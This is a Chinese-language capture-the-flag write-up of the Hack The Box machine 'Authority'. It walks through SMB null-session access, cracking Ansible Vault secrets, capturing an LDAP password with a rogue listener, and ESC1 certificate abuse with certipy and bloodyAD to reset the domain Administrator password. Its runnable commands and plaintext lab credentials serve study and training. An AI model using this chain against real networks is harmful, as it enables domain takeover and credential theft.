Authority

created: "2025-08-07 21:25"
tags:
  - HTB
  - PWM
  - SMB空会话
  - LDAP
  - ESC1
  - PTC
  - 流量分析
title: Authority
OS: Windows
difficulty:
  - Medium
datePublished: 2023-07-15
image: attachments/Pasted image 20250807212703.png
author:
  - Sentinal
  - mrb3n8132
comment: 
aliases: 
score: 8
scoreStar: 
favorite: false
updated: "2025-08-08 01:04"

Pasted image 20250807212703.png

1. 立足点&User

1.1. 信息收集

1.1.1. 端口扫描

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# nmap 10.10.11.222 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 09:35 EDT
Warning: 10.10.11.222 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.222
Host is up (7.9s latency).
Not shown: 34783 filtered tcp ports (no-response), 30732 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
8443/tcp  open  https-alt
9389/tcp  open  adws
49664/tcp open  unknown
49665/tcp open  unknown
49690/tcp open  unknown
49691/tcp open  unknown
49703/tcp open  unknown
49711/tcp open  unknown
51539/tcp open  unknown
51590/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 110.60 seconds

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# nmap 10.10.11.222 -p 53,80,135,139,445,464,593,636,3269,5985,8443,9389 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-07 09:37 EDT
Nmap scan report for 10.10.11.222
Host is up (0.38s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-07T17:14:52+00:00; +3h35m50s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2025-08-07T17:14:52+00:00; +3h35m50s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: othername: UPN:AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8443/tcp open  ssl/http      Apache Tomcat (language: en)
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2025-08-05T17:02:34
|_Not valid after:  2027-08-08T04:40:58
|_ssl-date: TLS randomness does not represent time
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h35m49s, deviation: 0s, median: 3h35m49s
| smb2-time: 
|   date: 2025-08-07T17:14:45
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.60 seconds

1.1.2. SMB

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# nxc smb authority.htb -u guest -p '' --shares
SMB         10.10.11.222    445    AUTHORITY        [*] Windows 10 / Server 2019 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.222    445    AUTHORITY        [+] authority.htb\guest: 
SMB         10.10.11.222    445    AUTHORITY        [*] Enumerated shares
SMB         10.10.11.222    445    AUTHORITY        Share           Permissions     Remark
SMB         10.10.11.222    445    AUTHORITY        -----           -----------     ------
SMB         10.10.11.222    445    AUTHORITY        ADMIN$                          Remote Admin
SMB         10.10.11.222    445    AUTHORITY        C$                              Default share
SMB         10.10.11.222    445    AUTHORITY        Department Shares                 
SMB         10.10.11.222    445    AUTHORITY        Development     READ            
SMB         10.10.11.222    445    AUTHORITY        IPC$            READ            Remote IPC
SMB         10.10.11.222    445    AUTHORITY        NETLOGON                        Logon server share
SMB         10.10.11.222    445    AUTHORITY        SYSVOL                          Logon server share

发现存在 SMB空会话，且对 Development 目录有读取的权限

连接查看
Pasted image 20250807222258.png
有四个目录，挨个看看

1.1.3. WEB

IIS Pasted image 20250807215118.png
目录扫描

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# dirsearch -u http://10.10.11.222/ -x 403 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/htb/Authority/reports/http_10.10.11.222/__25-08-07_09-52-29.txt

Target: http://10.10.11.222/

[09:52:29] Starting: 

Task Completed

没结果，这时候，可以尝试换一个大字典，但估计作用不大

1.1.4. https 8443

Pasted image 20250807220133.png
这种 ssl/http 就是 https

进来后会跳转到 /pwn/private/login

PWM 是一款面向 LDAP 目录的开源密码自助服务应用程序。

Pasted image 20250807220210.png
点击 Configuration Manager 可以跳转到这个网页，下面都是一些认证记录，其中可以发现一个用户名 svc_pwm
Pasted image 20250807220316.png
上面就一个配置密码
随便输入一个密码，提示不正确
Pasted image 20250807220406.png

因为我们可以SMB匿名访问到 PWM 目录，所以我们尝试看看里面有没有什么好东西

1.2. Ansible 哈希crack

在 defaults/main.yml 中可以发现网站的密码

┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat main.yml                         
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764

这是一个有 Ansible Vault 加密的文件，看了下hashcat wiki 发现hash对不上
Pasted image 20250807231154.png

你可以使用 john 来生成哈希值

你需要提取出其中可以被计算出哈希的格式

┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat pwm_admin_login.hash 
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat pwm_admin_password  
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat ldap_admin_password 
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764

然后计算哈希

┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible2john ldap_admin_password 
ldap_admin_password:$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2fe98334284203635
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible2john pwm_admin_login.hash 
pwm_admin_login.hash:$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible2john pwm_admin_password 
pwm_admin_password:$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5

这三个就是 hashcat 能够识别的哈希了

破解明文密码,这个密码并不是对应的账号密码，而是ansible vault的仓库密码
Pasted image 20250807232141.png
三个明文密码都是一样的 !@#$%^&*

你可以使用ansible-vault工具使用仓库密码进行解密出明文密码

kali输入 ansible-vault 即可安装

┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible-vault decrypt ldap_admin_password 
Vault password: !@#$%^& 
Decryption successful
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat ldap_admin_password 
DevT3st@123                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible-vault decrypt pwm_admin_login.hash 
Vault password: !@#$%^& 
Decryption successful
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat pwm_admin_login.hash                  
svc_pwm                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# ansible-vault decrypt pwm_admin_password  
Vault password: !@#$%^& 
Decryption successful
                                                                                                      
┌──(root㉿kali)-[~/…/htb/Authority/PWM/defaults]
└─# cat pwm_admin_password                  
pWm_@dm!N_!23

获取到一对账号密码 svc_pwm / pWm_@dm !N_!23
还有一个ldap管理员的密码 DevT3st@123

1.3. ldap 流量捕获

使用密码 pWm_@dm !N_!23 可以登录到Configuration Manager
Pasted image 20250807233408.png

在ldap的目录连接界面里面，可以发现有一个账号 svc_ldap 此外还可以看到密码显示已经保存了。但是你再网页上是看不到的
Pasted image 20250807233704.png

上面有一个 Test LDAP Profile
点击它后显示连接错误，找不到ldap url对应的内容
Pasted image 20250807233818.png

我可以尝试在本地开启一个ldap默认端口的监听，然后让他访问

这里使用389端口，因为636是LDAPS的端口会加密，可能会影响我收到的数据

我添加了一个指向指定ldap地址，然后开启监听，再点Test LDAP Profile
Pasted image 20250807234231.png

你可以收到一些信息
Pasted image 20250807234245.png
后面的内容可能是密码，但是我这里看的不是很清楚

我尝试使用 tcpdump 来进行抓包

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# tcpdump -i tun0  -w ldap.pacp
tcpdump: listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
^C25 packets captured
25 packets received by filter
0 packets dropped by kernel

然后使用 wireshark 来查看其内容
Pasted image 20250807235228.png
过滤ldap协议，可以看到疑似密码的字符串
lDaP_1n_th3_cle4r!

验证一下
Pasted image 20250807235817.png

1.4. bloodhound

直接上 bloodhound

Warning

由于目标机器没有开放ldap(389)端口，所以使用 bloodhound-python 以及 rusthound 收集都会报错
需要指定使用ldaps(636)端口才行。
使用nxc收集则不会报错

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# rusthound-ce --domain authority.htb -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -c All --zip --ldaps 
---------------------------------------------------
Initializing RustHound-CE at 12:06:29 on 08/07/25
Powered by @g0h4n_0
---------------------------------------------------

[2025-08-07T16:06:29Z INFO  rusthound_ce] Verbosity level: Info
[2025-08-07T16:06:29Z INFO  rusthound_ce] Collection method: All
[2025-08-07T16:06:29Z INFO  rusthound_ce::ldap] Connected to AUTHORITY.HTB Active Directory!
[2025-08-07T16:06:29Z INFO  rusthound_ce::ldap] Starting data collection...
[2025-08-07T16:06:29Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:30Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=authority,DC=htb
[2025-08-07T16:06:30Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:32Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=authority,DC=htb
[2025-08-07T16:06:32Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=authority,DC=htb
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=authority,DC=htb
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-08-07T16:06:36Z INFO  rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=authority,DC=htb
[2025-08-07T16:06:36Z INFO  rusthound_ce::api] Starting the LDAP objects parsing...
[2025-08-07T16:06:36Z INFO  rusthound_ce::objects::domain] MachineAccountQuota: 10
⠂ Parsing LDAP objects: 5%                                                                                 [2025-08-07T16:06:36Z INFO  rusthound_ce::objects::enterpriseca] Found 13 enabled certificate templates
[2025-08-07T16:06:36Z INFO  rusthound_ce::api] Parsing LDAP objects finished!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::checker] Starting checker to replace some values...
██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░��░░░░░░░░░ 2/7
████████░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░���░░░░ 5/
█░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░���░░░░░░░░░░░░░ 1/
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░���░░░░░░░░░░░░░░░░░░░░░ 0
████████████████████████░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░���░░░░░░░░░░░░░░░░░░░░░░░░░░░ 9/
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 5 users parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 60 groups parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 1 computers parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 ous parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 domains parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 gpos parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 74 containers parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 1 ntauthstores parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 aiacas parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 rootcas parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 1 enterprisecas parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 37 certtemplates parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] 3 issuancepolicies parsed!
[2025-08-07T16:06:36Z INFO  rusthound_ce::json::maker::common] .//20250807120636_authority-htb_rusthound-ce.zip created!

RustHound-CE Enumeration Completed at 12:06:36 on 08/07/25! Happy Graphing!

1.5. winrm

Pasted image 20250808001411.png
Pasted image 20250808001509.png

2. System

2.1. ESC1

Pasted image 20250808001545.png
发现当前用户可以注册很多模版，而且对CA也有 enroll 权限

直接上 certipy 扫描

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy-ad find -u svc_ldap -p lDaP_1n_th3_cle4r! -dc-ip 10.10.11.222 -vulnerable -stdout 
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 21 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'AUTHORITY-CA'
[*] Checking web enrollment for CA 'AUTHORITY-CA' @ 'authority.authority.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : AUTHORITY-CA
    DNS Name                            : authority.authority.htb
    Certificate Subject                 : CN=AUTHORITY-CA, DC=authority, DC=htb
    Certificate Serial Number           : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Certificate Validity Start          : 2023-04-24 01:46:26+00:00
    Certificate Validity End            : 2123-04-24 01:56:25+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : AUTHORITY.HTB\Administrators
      Access Rights
        ManageCa                        : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        ManageCertificates              : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Enroll                          : AUTHORITY.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollmentCheckUserDsCertificate
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
                                          Document Signing
                                          IP security IKE intermediate
                                          IP security use
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 20 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2023-03-24T23:48:09+00:00
    Template Last Modified              : 2023-03-24T23:48:11+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : AUTHORITY.HTB\Administrator
        Full Control Principals         : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Write Property Enroll           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
    [+] User Enrollable Principals      : AUTHORITY.HTB\Domain Computers
    [!] Vulnerabilities
      `ESC1`                              : Enrollee supplies subject and template allows client authentication.

发现证书模版 CorpVPN 存在 ESC1 漏洞
直接看文档：06 ‐ Privilege Escalation · ly4k/Certipy Wiki · GitHub
跟着利用即可

但是注意我们当前的用户 svc_ldap 是无法注册 CorpVPN 证书的
Pasted image 20250808001545.png

但是 Domain Computors 组的用户可以注册
Pasted image 20250808003331.png
1：创建一个机器用户
先看下当前用户是否可以创建计算机用户

nxc ldap authority.htb -u svc_ldap -p  'lDaP_1n_th3_cle4r!' -M maq

Pasted image 20250808003436.png
可以，使用 bloodyAD 创建一个计算机用户

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# bloodyAD --host 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -d authority.htb add computer c1trus A
dmin!
[+] c1trus$ created

2：为目标用户请求证书

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy req \
    -u 'c1trus$' -p 'Admin!' \
    -dc-ip '10.10.11.222' -target 'authority.authority.htb' \
    -ca 'AUTHORITY-CA' -template 'CorpVPN' \
    -upn 'administrator@authority.htb' -sid 'S-1-5-21-622327497-3269355298-2248959698-500'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 4
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@authority.htb'
[*] Certificate object SID is 'S-1-5-21-622327497-3269355298-2248959698-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

3: 使用pfx证书进行认证获取目标用户的hash

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy auth -pfx 'administrator.pfx' -dc-ip '10.10.11.222'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@authority.htb'
[*]     SAN URL SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*]     Security Extension SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*] Using principal: 'administrator@authority.htb'
[*] Trying to get TGT...
[-] Got error while trying to request TGT:` Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)`
[-] Use -debug to print a stacktrace
[-] See the wiki for more information

Warning

这里失败了
有时域控制器不支持 PKINIT 协议，这可能是因为其证书未包含 Smart Card Logon 扩展密钥用法(EKU)。
大多数情况下，当 EKU 缺失时，域控制器会返回 KDC_ERR_PADATA_TYPE_NOSUPP 错误。
但是，包括 LDAP 在内的多种协议都支持 Schannel，即通过 TLS 进行认证。
需要注意的是，"Schannel 认证"这一术语源自 Schannel SSP（安全服务提供程序），这是 Microsoft 在 Windows 系统中实现的 SSL/TLS 组件，因此 Schannel 认证本质上就是 SSL/TLS 客户端认证

可以参考这篇文章的具体说明Certificates and Pwnage and Patches, Oh My! | by Will Schroeder | Posts By SpecterOps Team Members

2.2. PTC

Pass the Certificate | The Hacker Recipes 可以看这里

这里可以直接用 certipy 登录域管的ldap-shell,然后直接改域管密码即可

┌──(root㉿kali)-[~/Desktop/htb/Authority]
└─# certipy auth -pfx administrator.pfx -dc-ip "10.10.11.222" -ldap-shell 
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'administrator@authority.htb'
[*]     SAN URL SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*]     Security Extension SID: 'S-1-5-21-622327497-3269355298-2248959698-500'
[*] Connecting to 'ldaps://10.10.11.222:636'

[*] Authenticated to '10.10.11.222' as: 'u:HTB\\Administrator'
Type help for list of commands

# 

# whoami
u:HTB\Administrator

# change_password administrator Admin123!
Got User DN: CN=Administrator,CN=Users,DC=authority,DC=htb
Attempting to set new password of: Admin123!
Password changed successfully!

Pasted image 20250808005426.png

Pasted image 20250808005518.png